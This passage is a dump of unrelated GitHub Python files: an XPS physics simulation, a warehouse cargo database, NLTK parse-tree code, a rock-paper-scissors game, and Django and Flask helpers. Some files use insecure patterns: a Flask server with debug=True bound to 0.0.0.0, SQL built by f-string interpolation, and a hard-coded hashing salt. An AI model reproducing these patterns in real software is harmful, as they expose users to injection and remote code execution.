range(nfermi):\n if bra == hole:\n mel[bra][ket] = np.dot(evecf__[head], eveci__[ket])\n if bra < nfermi and bra != hole:\n mel[bra][ket] = np.dot(evecf__[bra], eveci__[ket])\n ener_excit = evalf[head] - evalf[hole]\n ener_norm = ener_excit / normaliz(n, w)\n return ener_excit, np.power(la.det(mel), 2), ener_norm\n\n\ndef spectrum(ni, nf, k, w, head):\n \"\"\"\"compute xps rates for a logarithmic sequence of energies of a fixed head\"\"\"\n n_erg: int = int((nf - ni) / 2)\n erg_ = np.zeros((n_erg))\n rate_ = np.zeros_like(erg_)\n erg_norm_ = np.zeros_like(rate_)\n\n count = 0\n for n in range(ni, nf, 2):\n nfermi = int((n + 1) / 2)\n n_hole = nfermi - head\n n_excit = nfermi + head - 1\n erg_[count], rate_[count], erg_norm_[count] = xps_proj(n, k, w, n_hole, n_excit)\n count += 1\n return erg_, rate_\n\n\ndef spectrum_sec(ni, nf, k, w, head):\n \"\"\"\"compute secondary xps rates for a logarithmic sequence of energies above a fixed head\"\"\"\n erg_sec_ = np.zeros((int((nf-ni)/2)*np.power(head - 1, 2)))\n rate_sec_ = np.zeros_like(erg_sec_)\n erg_sec_norm_ = np.zeros_like(erg_sec_)\n\n count = 0\n for n in range(ni, nf, 2):\n nfermi = int((n + 1) / 2)\n n_hole = nfermi - head\n n_excit = nfermi + head - 1\n for j in range(n_hole + 1, nfermi):\n for u in range(nfermi, n_excit):\n erg_sec_[count], rate_sec_[count], erg_sec_norm_[count] = xps_proj(n, k, w, j, u)\n count += 1\n return erg_sec_, rate_sec_\n\n\ndef convolution(ni, nf, k, w, head):\n \"\"\"compute xps rate with a convolution with a box function\"\"\"\n erg_, rate_ = spectrum(ni, nf, k, w, head)\n erg_sec_, rate_sec_ = spectrum_sec(ni, nf, k, w, head)\n erg_conv_ = np.zeros(len(rate_)-2)\n rate_conv_ = np.zeros_like(erg_conv_)\n soma = np.zeros(len(erg_)-2)\n for i in range(len(erg_)-2):\n for j in range(len(erg_sec_)):\n if np.sqrt(erg_[i+1]*erg_[i+2]) < erg_sec_[j] < np.sqrt(erg_[i]*erg_[i+1]):\n soma[i] += rate_sec_[j]\n rate_conv_[i] = (soma[i] + rate_[i+1]) / np.power(np.log(np.power(lamb(), 2)), 1)\n erg_conv_[i] = erg_[i+1]\n return erg_conv_, rate_conv_\n\n\ndef binarystates(n, head):\n \"\"\"List of every possible state for a number n\"\"\"\n nfermi = int((n+1)/2)\n decimal_states_ = []\n for i in range(2**(n+1)):\n nn = gmpy2.mpz(i)\n if gmpy2.popcount(nn) == nfermi:\n decimal_states_.append(nn)\n l = len(decimal_states_)\n filled__ = np.zeros((l, nfermi))\n list = []\n for j in range(l):\n count = 0\n for k in range(nfermi):\n level = gmpy2.bit_scan1(decimal_states_[j], count)\n filled__[j][k] = level\n count = level + 1\n for i in range(1, len(filled__)):\n for j in range(nfermi):\n #if j < nfermi - head:\n # if filled__[i][j] != filled__[0][j]:\n # list.append(i)\n if j > nfermi - head:\n if filled__[i][j] > nfermi + 2:\n list.append(i)\n return np.delete(filled__, list, 0)\n\n\ndef xps_proj_binary(n, k, w, head):\n \"\"\"compute all the xps ray (primary and secondary) for states in binary form\"\"\"\n m__ = binarystates(n, head)\n evali, eveci__, adm_eneri_ = dig_ham(n, 0, w)\n evalf, evecf__, adm_enerf_ = dig_ham(n, k, w)\n nfermi = int((n + 1) / 2)\n rate_ = np.zeros(len(m__)-1)\n erg_ = np.zeros(len(m__)-1)\n for state in range(1, len(m__)):\n mel = np.zeros((nfermi, nfermi))\n sum_hole = 0\n sum_excit = 0\n for bra in range(nfermi):\n for ket in range(nfermi):\n mel[bra][ket] = np.dot(evecf__[int(m__[state][bra])], eveci__[int(m__[0][ket])])\n ener_hole = evalf[int(m__[0][bra])]\n ener_excit = evalf[int(m__[state][bra])]\n sum_hole += ener_hole\n sum_excit += ener_excit\n erg_[state-1] = sum_excit - sum_hole\n rate_[state-1] = np.power(la.det(mel), 2)\n return erg_, rate_\n\ndef binary_convolution(ni, nf, k, w, head):\n \"\"\"compute all the xps ray for states in binary form with a convolution box function\"\"\"\n erg_, rate_ = spectrum(ni, nf, k, w, head)\n rate_conv_ = np.zeros(len(erg_) - 2)\n erg_conv_ = np.zeros_like(rate_conv_)\n for n in range(ni, nf-4, 2):\n ergs_, rates_ = xps_proj_binary(n, k, w, head)\n for i in range(len(erg_) - 2):\n for j in range(len(ergs_) - 2):\n if np.sqrt(erg_[i + 1] * erg_[i + 2]) < ergs_[j] < np.sqrt(erg_[i] * erg_[i + 1]):\n rate_conv_[i] += rates_[j]\n erg_conv_[i] = erg_[i+1]\n return erg_conv_, rate_conv_ / (np.log(np.power(lamb(), 2)))\n\n\ndef dig_ham_imp(n, k, d, v, w):\n \"\"\"Hamiltonian: n(odd) = Matrix Dimension / k = scattering potential / v = impurity bounding energy\"\"\"\n if n % 2 == 0:\n print(\"Sorry: n must be odd\")\n exit(1)\n\n else:\n ham__ = np.zeros((n + 1, n + 1))\n ham__[0][0] = d\n ham__[1][1] = k\n ham__[1][2] = ham__[2][1] = T / np.sqrt(w)\n ham__[0][1] = ham__[1][0] = v\n for i in range(2, (n + 1) - 1):\n ham__[i][i + 1] = ham__[i + 1][i] = t_n(i - 2, w)\n eval_, evec__ = la.eigh(ham__)\n return eval_, evec__.T, eval_ / normaliz(n, w)\n\n\ndef xps_proj_imp(n, k, d, v, w, hole, excit):\n \"\"\"Determinant of a projection of the final state over the initial: ne = number of electrons in the conduction band\n hole = hole state below Fermi's level / excit = particle state above Fermi's level / k = scattering potential\"\"\"\n nfermi = int((n + 1) / 2)\n mel = np.zeros((nfermi, nfermi))\n evali, eveci__, adm_eneri_ = dig_ham_imp(n, 0, d, v, w)\n evalf, evecf__, adm_enerf_ = dig_ham_imp(n, k, d, v, w)\n for bra in range(n):\n for ket in range(nfermi):\n if bra == hole:\n mel[bra][ket] = np.dot(evecf__[excit], eveci__[ket])\n if bra < nfermi and bra != hole:\n mel[bra][ket] = np.dot(evecf__[bra], eveci__[ket])\n ener_excit = evalf[excit] - evalf[hole]\n return ener_excit, np.power(la.det(mel), 2)\n\n\ndef spectrum_imp(ni, nf, k, d, v, w, head):\n \"\"\"\"compute xps rates for a logarithmic sequence of energies of a fixed head\"\"\"\n n_erg: int = int((nf - ni) / 2)\n erg_imp_ = np.zeros((n_erg))\n rate_imp_ = np.zeros_like(erg_imp_)\n\n count = 0\n for n in range(ni, nf, 2):\n nfermi = int((n + 1) / 2)\n n_hole = nfermi - head\n n_excit = nfermi + head - 1\n erg_imp_[count], rate_imp_[count] = xps_proj_imp(n, k, d, v, w, n_hole, n_excit)\n count += 1\n return erg_imp_, rate_imp_\n\n\ndef xps_proj_imp_binary(n, k, d, v, w, head):\n \"\"\"compute all the xps ray (primary and secondary) for states in binary form\"\"\"\n m__ = binarystates(n, head)\n evali, eveci__, adm_eneri_ = dig_ham_imp(n, 0, d, v, w)\n evalf, evecf__, adm_enerf_ = dig_ham_imp(n, k, d, v, w)\n nfermi = int((n + 1) / 2)\n rate_imp_ = np.zeros(len(m__)-1)\n erg_imp_ = np.zeros(len(m__)-1)\n for state in range(1, len(m__)):\n mel = np.zeros((nfermi, nfermi))\n sum_hole = 0\n sum_excit = 0\n for bra in range(nfermi):\n for ket in range(nfermi):\n mel[bra][ket] = np.dot(evecf__[int(m__[state][bra])], eveci__[int(m__[0][ket])])\n ener_hole = evalf[int(m__[0][bra])]\n ener_excit = evalf[int(m__[state][bra])]\n sum_hole += ener_hole\n sum_excit += ener_excit\n erg_imp_[state-1] = sum_excit - sum_hole\n rate_imp_[state-1] = np.power(la.det(mel), 2)\n return erg_imp_, rate_imp_\n\n\ndef binary_convolution_imp(ni, nf, k, d, v, w, head):\n \"\"\"compute all the xps ray for states in binary form with a convolution box function\"\"\"\n erg_, rate_ = spectrum_imp(ni, nf, k, d, v, w, head)\n rate_conv_ = np.zeros(len(erg_) - 2)\n erg_conv_ = np.zeros_like(rate_conv_)\n for n in range(ni, nf-4, 2):\n ergs_, rates_ = xps_proj_imp_binary(n, k, d, v, w, head)\n for i in range(len(erg_) - 2):\n for j in range(len(ergs_) - 2):\n if np.sqrt(erg_[i + 1] * erg_[i + 2]) < ergs_[j] < np.sqrt(erg_[i] * erg_[i + 1]):\n rate_conv_[i] += rates_[j]\n erg_conv_[i] = erg_[i+1]\n return erg_conv_, rate_conv_\n\n\ndef inside(ni, nf, k, d, v, head):\n es = []\n ws = []\n eps = []\n erg_, rate_ = spectrum_imp(ni, nf, k, d, v, 2, head)\n dw = 1 / np.power(10, 7)\n iw = int_w() + dw\n for i in range(len(int_epsilon())):\n for p in range(len(int_w()) - 1):\n for j in range(len(erg_)):\n if (spectrum_imp(ni, nf, k, d, v, int_w()[p], head)[0][j] - int_epsilon()[i]) * (\n spectrum_imp(ni, nf, k, d, v, int_w()[p + 1], head)[0][j]\n - int_epsilon()[i]) < 0:\n es.append(j)\n ws.append(p)\n eps.append(int_epsilon()[i])\n erg_w_ = np.zeros(len(es))\n rate_w_ = np.zeros(len(es))\n for i in range(len(es)):\n erg_w_[i] = eps[i]\n rate_w_[i] = spectrum_imp(ni, nf, k, d, v, int_w()[ws[i]], head)[1][es[i]]\n return erg_w_, rate_w_\n","repo_name":"Marinopl/Projetos-Pessoais","sub_path":"XPS.py","file_name":"XPS.py","file_ext":"py","file_size_in_byte":11715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35564241416","text":"from flask import Flask, render_template\nfrom src.redraw_graph_html import redraw_graph_html\nfrom src.query_database import query_database\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef redraw_node_graph():\n nodes, edges = query_database()\n redraw_graph_html(nodes, edges)\n return render_template(\"nx.html\")\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", debug=True)\n","repo_name":"LyndinK/dependencyVizualizer","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18757681003","text":"import sqlite3 as sl\nimport abc\nimport copy\nimport datetime\nfrom typing import List\nfrom datetime import datetime\n\n\n# Абстрактный класс наблюдателя, от него наследуется тот класс, который будет следить за датой\nclass IObserver(metaclass=abc.ABCMeta):\n @abc.abstractmethod\n def update(self, date: str, id, ):\n pass\n\n\n# Абстрактный класс наблюдаемого, от него будет наследоваться класс Cargo.\n# также необходимо будет переопределить методы этого класса в классе Cargo (пример на классе Date ниже)\nclass IObservable(metaclass=abc.ABCMeta):\n @abc.abstractmethod\n def add_observer(self, o: IObserver):\n pass\n\n @abc.abstractmethod\n def remove_observer(self, o: IObserver):\n pass\n\n @abc.abstractmethod\n def notify(self):\n pass\n\nclass dateListener(IObserver):\n def __init__(self, obj: IObservable):\n self.__date = obj\n obj.add_observer(self)\n\n def update(self, date_: str, id):\n if str(date_) <= datetime.today().strftime(\"%Y-%m-%d\"):\n print('some shit is happened', id)\n take_from_table(con)\n send_to_logs(id)\n self.__date.remove_observer(self)\n\n#def\n\n# Класс грузов:\nclass Cargo(IObservable):\n def __init__(self,\n cargo_id: int,\n name: str,\n amount: int,\n provider: str,\n recipient: str,\n date_of_receiving: str,\n departure_date: str,\n location_building: str,\n location_shelf: int,\n location_row: int,\n min_humidity: int,\n max_humidity: int):\n self.cargo_id = cargo_id\n self.name = name\n self.amount = amount\n self.provider = provider\n self.recipient = recipient\n self.date_of_receiving = date_of_receiving\n self.departure_date = departure_date\n self.location_building = location_building\n self.location_shelf = location_shelf\n self.location_row = location_row\n self.min_humidity = min_humidity\n self.max_humidity = max_humidity\n self.observers: List[IObserver] = []\n\n def clone(self):\n return copy.copy(self)\n\n def coming_date(self):\n self.notify()\n\n def add_observer(self, o: IObserver):\n self.observers.append(o)\n\n def remove_observer(self, o: IObserver):\n self.observers.remove(o)\n\n def notify(self):\n for o in self.observers:\n o.update(self.departure_date, self.cargo_id)\n\n def __del__(self):\n return 0\n\n\n# Прототип груза:\nprototype_cargo = Cargo(0, \"\", 0, \"\", \"\", \"\", \"\", \"\", 0, 0, 0, 0)\n\n\n\n# Функция создания груза через копирование прототипа:\ndef create_cargo_no_id(name: str,\n amount: int,\n provider: str,\n recipient: str,\n date_of_receiving: str,\n departure_date: str,\n location_building: str,\n location_shelf: int,\n location_row: int,\n min_humidity: int,\n max_humidity: int) -> Cargo:\n # Создание нового груза через копирование прототипа:\n cargo = Cargo.clone(prototype_cargo)\n\n # Назначение переменных-элементов груза:\n cargo.name = name\n cargo.amount = amount\n cargo.provider = provider\n cargo.recipient = recipient\n cargo.date_of_receiving = date_of_receiving\n cargo.departure_date = departure_date\n cargo.location_building = location_building\n cargo.location_shelf = location_shelf\n cargo.location_row = location_row\n cargo.min_humidity = min_humidity\n cargo.max_humidity = max_humidity\n\n return cargo\n\n\ncon = sl.connect('cargo.db')\ncon2 = sl.connect('logcargo.db')\n\n\ndef create_table(con_in):\n with con_in:\n con_in.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS CARGOS (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n name TEXT,\n amount INTEGER,\n provider TEXT,\n recipient TEXT,\n date_of_receiving DATE,\n departure_date DATE,\n location_building TEXT,\n location_shelf INTEGER,\n location_row INTEGER, \n min_humidity INTEGER CHECK (min_humidity>=0 and min_humidity<=100),\n max_humidity INTEGER CHECK (max_humidity>=0 and max_humidity<=100) \n );\n \"\"\")\n\n\ndef insert_in_table(cargo: Cargo):\n cargo_id = 0\n data = con.execute(\"SELECT EXISTS (SELECT 1 FROM CARGOS)\")\n for row in data:\n if row[0] != 0:\n data2 = con.execute(\"SELECT * FROM CARGOS ORDER BY id DESC LIMIT 1\")\n for row2 in data2:\n cargo_id = row2[0] + 1\n else:\n cargo_id = 1\n\n sql = 'INSERT INTO CARGOS (id, name, amount, provider, recipient, date_of_receiving, departure_date, ' \\\n 'location_building, location_shelf, location_row, min_humidity, max_humidity) values(?, ?, ?, ?, ?, ?, ?, ?, ' \\\n '?, ?, ?, ?)'\n if cargo_id != 0:\n data = [(cargo_id,\n cargo.name,\n cargo.amount,\n cargo.provider,\n cargo.recipient,\n cargo.date_of_receiving,\n cargo.departure_date,\n cargo.location_building,\n cargo.location_shelf,\n cargo.location_row,\n cargo.min_humidity,\n cargo.max_humidity)]\n with con:\n con.executemany(sql, data)\n del cargo\n\n\ndef take_from_table(choose_con):\n cargos_list = []\n with choose_con:\n data = choose_con.execute(\"SELECT * FROM CARGOS\")\n lst = data.fetchall()\n for j in range(0, len(lst)):\n cargo_entity = Cargo.clone(prototype_cargo)\n cargo_entity.cargo_id = lst[j][0]\n cargo_entity.name = lst[j][1]\n cargo_entity.amount = lst[j][2]\n cargo_entity.provider = lst[j][3]\n cargo_entity.recipient = lst[j][4]\n cargo_entity.date_of_receiving = lst[j][5]\n cargo_entity.departure_date = lst[j][6]\n cargo_entity.location_building = lst[j][7]\n cargo_entity.location_shelf = lst[j][8]\n cargo_entity.location_row = lst[j][9]\n cargo_entity.min_humidity = lst[j][10]\n cargo_entity.max_humidity = lst[j][11]\n cargos_list.append(cargo_entity)\n\n return cargos_list\n\n\ndef send_to_logs(sent_id: int):\n global glob_id\n #f\"SELECT EXISTS (SELECT * FROM CARGOS WHERE id = {sent_id})\"\n with con:\n data = con.execute(f\"SELECT * FROM CARGOS WHERE id = {sent_id}\")\n print(con.execute(f\"SELECT * FROM CARGOS WHERE id = {sent_id}\"))\n cargo_to_send = data.fetchone()\n\n data = con.execute(f\"SELECT EXISTS (SELECT * FROM CARGOS WHERE id = {sent_id})\")\n con.execute(f\"DELETE FROM CARGOS WHERE id = {sent_id}\")\n\n for row in data:\n print(row)\n if row[0] != 0:\n sql = 'INSERT OR IGNORE INTO CARGOS (id, name, amount, provider, recipient, date_of_receiving, departure_date, ' \\\n 'location_building, location_shelf, location_row, min_humidity, max_humidity) values(?, ?, ?, ?, ?, ?, ?, ?, ' \\\n '?, ?, ?, ?)'\n data = [(glob_id,\n cargo_to_send[1],\n cargo_to_send[2],\n cargo_to_send[3],\n cargo_to_send[4],\n cargo_to_send[5],\n cargo_to_send[6],\n cargo_to_send[7],\n cargo_to_send[8],\n cargo_to_send[9],\n cargo_to_send[10],\n cargo_to_send[11])]\n with con2:\n con2.executemany(sql, data)\n glob_id += 1\n\n\nCrg = create_cargo_no_id('Шины Michelin X-Ice North 4 SUV 225/65 R17', 4, 'Michelin SCA', 'ИП Подъёмник', '2022-10-15', '2022-12-20', 'storage1',\n 2, 1, 10, 60)\nCrg1 = create_cargo_no_id('Крыло правое переднее Nissan 350z', 1, 'ОАО Бокс-кит', 'ЗАО Автострой', '2022-9-15', '2023-1-13', 'storage1',\n 2, 2, 20, 50)\nCrg2 = create_cargo_no_id('Привод передний ВАЗ-2107', 4, 'АО АвтоВАЗ', 'ИП Подъёмник', '2022-7-15', '2022-10-11', 'storage2',\n 3, 4, 10, 100)\n\n\n\nglob_id = 1\ncreate_table(con)\ncreate_table(con2)\n# insert_in_table(Crg)\n# insert_in_table(Crg1)\n# insert_in_table(Crg2)\n","repo_name":"RusJ-KH/Warehouse","sub_path":"dbinterface.py","file_name":"dbinterface.py","file_ext":"py","file_size_in_byte":8972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"290615804","text":"#encoding=utf8\r\nimport nltk.tree as tree\r\nimport nltk\r\n\r\ndef get_vn_pair():\r\n pass\r\ndef get_noun_chunk(tree):\r\n noun_chunk=[]\r\n if tree.label()==\"NP\":\r\n nouns_phase=''.join(tree.leaves())\r\n noun_chunk.append(nouns_phase) \r\n return noun_chunk\r\n\r\ndef get_ip_recursion_noun(tree):\r\n np_list=[]\r\n if len(tree)==1:\r\n tr=tree[0]\r\n get_ip_recursion_noun(tr)\r\n if len(tree)==2:\r\n tr=tree[0]\r\n get_ip_recursion_noun(tr) \r\n tr=tree[1]\r\n get_ip_recursion_noun(tr) \r\n if len(tree)==3:\r\n tr=tree[0]\r\n get_ip_recursion_noun(tr) \r\n tr=tree[1]\r\n get_ip_recursion_noun(tr) \r\n tr=tree[2]\r\n get_ip_recursion_noun(tr) \r\n if tree.label()=='NP':\r\n np_list.append(get_noun_chunk(tree))\r\n return np_list\r\n\r\n\r\n\r\ndef get_vv_loss_np(tree):\r\n if not isinstance(tree,nltk.tree.Tree):\r\n return False\r\n stack=[]\r\n np=[]\r\n stack.append(tree)\r\n current_tree=''\r\n while stack:\r\n current_tree=stack.pop()\r\n if isinstance(current_tree,nltk.tree.Tree) and current_tree.label()=='VP':\r\n continue \r\n elif isinstance(current_tree,nltk.tree.Tree) and current_tree.label()!='NP':\r\n for i in range(len(current_tree)): \r\n stack.append(current_tree[i])\r\n elif isinstance(current_tree,nltk.tree.Tree) and current_tree.label()=='NP':\r\n np.append(get_noun_chunk(tree))\r\n if np:\r\n return np\r\n else:\r\n return False\r\n \r\ndef search(tree_in): # 遍历刚才构建的树\r\n if not isinstance(tree_in,nltk.tree.Tree):\r\n return False \r\n vp_pair=[] \r\n stack=[]\r\n stack.append(tree_in)\r\n current_tree=''\r\n while stack:\r\n tree=stack.pop()\r\n if isinstance(tree,nltk.tree.Tree) and tree.label()==\"ROOT\": # 要处理的文本的语句\r\n for i in range(len(tree)):\r\n stack.append(tree[i])\t \r\n if isinstance(tree,nltk.tree.Tree) and tree.label()==\"IP\": # 简单从句\r\n for i in range(len(tree)):\r\n stack.append(tree[i])\t \r\n if isinstance(tree,nltk.tree.Tree) and tree.label()==\"VP\": # 动词短语\r\n duplicate=[]\r\n if len(tree)>=2:\r\n for i in range(1,len(tree)):\r\n if tree[0].label()=='VV' and tree[i].label()==\"NP\": # 动词 和 名词短语\r\n verb=''.join(tree[0].leaves()) # 合并动词 leaves是分词\r\n noun=get_noun_chunk(tree[i])\r\n if verb and noun:\r\n vp_pair.append((verb,noun)) # 返回 动名词短语对\r\n duplicate.append(noun)\r\n elif tree[0].label()=='VV' and tree[i].label()!=\"NP\":\r\n noun=get_vv_loss_np(tree)\r\n verb=''.join(tree[0].leaves())\r\n if verb and noun and noun not in duplicate:\r\n duplicate.append(noun)\r\n vp_pair.append((verb,noun))\r\n if vp_pair:\r\n return vp_pair\r\n else:\r\n return False \r\n\r\n\r\n #if tree.label()==\"NP\":\r\n #nouns_phase=''.join(tree.leaves())\r\n #noun_chunk.append(nouns_phase) \r\n","repo_name":"JackKuo666/NLP_basis","sub_path":"4_chapter/4.2依存句法树解析/recursionSearch.py","file_name":"recursionSearch.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"61"} +{"seq_id":"9346393204","text":"import random\r\nfile = open('rating.txt', 'r') # Reading the file named (rating.txt)\r\n# for converting the lines in the file to list (the name of the list is \"full_list\")\r\nlist_on_file = file.readlines()\r\nfull_list = []\r\nfor i in list_on_file:\r\n i.rstrip()\r\n a = i.split()\r\n for x in a:\r\n full_list.append(x)\r\nname = str(input('Enter your name:')) # entering the name of the user.\r\nprint('Hello,', name)\r\n# calculate the rating for users.\r\nif name in full_list:\r\n rating = int(full_list[full_list.index(name) + 1])\r\nelse:\r\n rating = 0\r\nadditional_inputs = input().split(',') # this list of the words which allowable for the user to select from.\r\nif len(additional_inputs) == 1 and additional_inputs[0] == '':\r\n print(\"Okay, let's start\")\r\n while True:\r\n allowable_inputs = ['rock', 'scissors', 'paper'] # The main list of words which allowable for the user to select from.\r\n user_input = input() # entering the user selection.\r\n computer_input = random.choice(allowable_inputs) # computer random selection.\r\n\r\n if user_input in allowable_inputs or user_input == '!exit' or user_input == '!rating':\r\n if user_input == '!rating':\r\n print('Your rating:', rating)\r\n \r\n if user_input in allowable_inputs or user_input == '!exit':\r\n game_dict_winning = {'paper': 'rock', 'scissors': 'paper', 'rock': 'scissors'}\r\n if game_dict_winning[computer_input] == user_input:\r\n print(\"Sorry, but computer chose {0}\".format(computer_input))\r\n elif computer_input == user_input:\r\n rating += 50 # in case of draw the rating of user increase (50)\r\n print(\"There is a draw ({0})\".format(user_input))\r\n elif user_input == '!exit':\r\n print('Bye!')\r\n break\r\n else: \r\n rating += 100 # in case of win the rating of user increase (100)\r\n print(\"Well done. Computer chose {0} and failed\".format(computer_input))\r\n else:\r\n print('Invalid input')\r\nelse:\r\n print(\"Okay, let's start\")\r\n while True:\r\n user_input = input() # entering the user selection.\r\n computer_input = random.choice(additional_inputs) # computer random selection.\r\n if user_input in additional_inputs or user_input == '!exit' or user_input == '!rating':\r\n if user_input == '!rating':\r\n print('Your rating:', rating)\r\n elif user_input in additional_inputs:\r\n elemnts_after_user_selection = additional_inputs[int(additional_inputs.index(user_input) + 1):int(len(additional_inputs))]\r\n elemnts_before_user_selection = additional_inputs[0:int(additional_inputs.index(user_input))]\r\n elemnts_after_user_selection.extend(elemnts_before_user_selection)\r\n computer_wins_list = elemnts_after_user_selection[0:int(len(elemnts_after_user_selection) / 2)]\r\n if computer_input in computer_wins_list:\r\n print(\"Sorry, but computer chose {0}\".format(computer_input))\r\n elif computer_input == user_input:\r\n rating += 50 # in case of draw the rating of user increase (50)\r\n print(\"There is a draw ({0})\".format(user_input))\r\n else:\r\n rating += 100 # in case of win the rating of user increase (100)\r\n print(\"Well done. Computer chose {0} and failed\".format(computer_input))\r\n elif user_input == '!exit':\r\n print('Bye!')\r\n break\r\n else:\r\n print('Invalid input')","repo_name":"MahmoudAbdulla1988/Rock-Paper-Scissors-game","sub_path":"Rock-Paper-Scissors-game.py","file_name":"Rock-Paper-Scissors-game.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5008456163","text":"# encoding:utf-8\nfrom random import Random\n\nfrom django.core.mail import send_mail\nfrom users.models import EmailVerifyRecord\nfrom MxOnline.settings import EMAIL_FROM\n\n\ndef send_link_email(email, send_type='register'):\n record = EmailVerifyRecord()\n record.email = email\n record.send_type = send_type\n if send_type == 'modify':\n record.code = generate_code(4)\n else:\n record.code = generate_code(16)\n record.save()\n if send_type == 'register':\n email_title = '慕学网注册链接'\n email_body = '慕学网注册激活链接:http://127.0.0.1/activate/{0}'.format(record.code)\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n return send_status\n if send_type == 'reset':\n email_title = '慕学网找回密码链接'\n email_body = '慕学网找回密码链接:http://127.0.0.1/reset/{0}'.format(record.code)\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n return send_status\n if send_type == 'modify':\n email_title = '慕学网更换邮箱验证码'\n email_body = '验证码:{0} '.format(record.code)\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n return send_status\n\n\ndef generate_code(code_length=4):\n code = ''\n codes = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'\n code_range = len(codes) - 1\n rand = Random()\n for i in range(code_length):\n code += codes[rand.randint(0, code_range)]\n return code\n","repo_name":"daigocy/mxonline","sub_path":"apps/utils/email_send.py","file_name":"email_send.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30687260727","text":"import uuid\nimport hashlib\n\nfrom .models import *\nfrom django.apps import apps\nfrom django.contrib.auth.models import User\nfrom datetime import date\n\nSALT = \"SALT\"\n\n\nclass PostgresManage:\n def create_notary(self, notary):\n # notary is dict with such keys:\n # * full_name\n # * license\n # * login\n # * pwd\n user = User.objects.create_user(username=notary['login'], password=notary['pwd'])\n notary = Notary(id=user, full_name=notary['full_name'], licensed=False, license=notary['license'])\n notary.save()\n return notary\n\n def create_encumbrance(self, encumbrance, ob, reason_doc):\n # encumbrance\n d_string = encumbrance['date'].split(\"-\")\n d_string = [int(ds) for ds in d_string]\n d = date(d_string[0], d_string[1], d_string[2])\n d_string = encumbrance['deadline'].split(\"-\")\n d_string = [int(ds) for ds in d_string]\n dd = date(d_string[0], d_string[1], d_string[2])\n prosecutor = self.read_prosecutors(encumbrance['prosecutor_id'])\n debtor = self.read_debtors(encumbrance['debtor_id'])\n\n reason_document_date_string = reason_doc['date'].split(\"-\")\n reason_document_date_string = [int(rdds) for rdds in reason_document_date_string]\n reason_document_date = date(reason_document_date_string[0], reason_document_date_string[1], reason_document_date_string[2])\n reason_document = ReasonDocument(name=reason_doc['name'], description=reason_doc['description'],\n date=reason_document_date)\n reason_document.save()\n\n obj = Object(serial_number=ob['serial_number'], description=ob['description'])\n obj.save()\n\n notary = self.read_notaries(encumbrance['notary_id'])\n enc = Encumbrance(date=d, prosecutor_id=prosecutor,\n debtor_id=debtor, notary_id=notary,\n reason_document=reason_document, encumbrance_kind=encumbrance['encumbrance_kind'],\n encumbrance_type=encumbrance['encumbrance_type'], debt_amount=encumbrance['debt_amount'],\n deadline=dd, object_id=obj, checked=False, hashcode=\"\",)\n enc.save()\n enc_id = enc.id\n enc.hashcode = hashlib.sha256(SALT.encode() + str(enc_id).encode()).hexdigest()\n enc.save()\n return enc_id\n\n def read_encumbrances(self, query=None, detailed_info=False):\n if query:\n try:\n query = int(query)\n except:\n pass\n\n if isinstance(query, int):\n if query > 0 and detailed_info:\n enc = Encumbrance.objects.filter(id=query).values()\n enc = enc[0]\n prosecutor = enc['prosecutor_id_id']\n prosecutor = self.read_prosecutors(prosecutor)\n prosecutor_addr = prosecutor.address_id\n debtor = enc['debtor_id_id']\n debtor = self.read_debtors(debtor)\n debtor_addr = debtor.address_id\n notary = enc['notary_id_id']\n notary = self.read_notaries(notary)\n reason_document = enc['reason_document_id']\n reason_document = self.read_reason_documents(reason_document)\n obj = enc['object_id_id']\n obj = self.read_objects(obj)\n if enc['checked']:\n return {\n \"encumbrance\": enc,\n \"prosecutor\": prosecutor,\n \"prosecutor_addr\": prosecutor_addr,\n \"debtor\": debtor,\n \"debtor_addr\": debtor_addr,\n \"notary\": notary,\n \"reason_document\": reason_document,\n \"object\": obj,\n }\n else:\n return None\n elif query > 0 and not detailed_info:\n return Encumbrance.objects.filter(id=query).values()\n else:\n return None\n elif not detailed_info:\n return Encumbrance.objects.filter(encumbrance_type=query).values()\n else:\n return None\n elif not detailed_info:\n return Encumbrance.objects.values('id', 'encumbrance_type', 'encumbrance_kind',\n 'date', 'notary_id__full_name')\n else:\n return None\n\n def read_prosecutors(self, id=None):\n if id:\n return Prosecutor.objects.get(id=id)\n else:\n return Prosecutor.objects.values('id', 'code')\n\n def read_debtors(self, id=None):\n if id:\n return Debtor.objects.get(id=id)\n else:\n return Debtor.objects.values('id', 'code')\n\n def read_reason_documents(self, id=None):\n if id:\n return ReasonDocument.objects.get(id=id)\n else:\n return ReasonDocument.objects.values('id', 'name')\n\n def read_objects(self, id=None):\n if id:\n return Object.objects.get(id=id)\n else:\n return Object.objects.values('id', 'serial_number')\n\n def read_notaries(self, id=None):\n if id:\n return Notary.objects.get(id_id=id)\n else:\n # TODO\n return None\n\n def read_addresses(self, id=None):\n if id:\n return Address.objects.get(id=id)\n else:\n # TODO\n return None\n\n def read_encumbrances_by_notary(self, notary_id):\n return Encumbrance.objects.filter(notary_id=notary_id).values()\n\n def read_encumbrance_for_modifying(self, enc_id):\n try:\n enc_id = int(enc_id)\n except:\n enc_id = -1\n return None\n if enc_id > 0:\n enc = Encumbrance.objects.filter(id=enc_id).values()\n return enc\n else:\n return None\n\n def modify_encumbrance(self, enc_id, new_values_enc, new_values_obj, new_values_rd):\n try:\n enc = Encumbrance.objects.filter(id=enc_id).get()\n except:\n return None\n\n # prosecutor\n prosecutor = 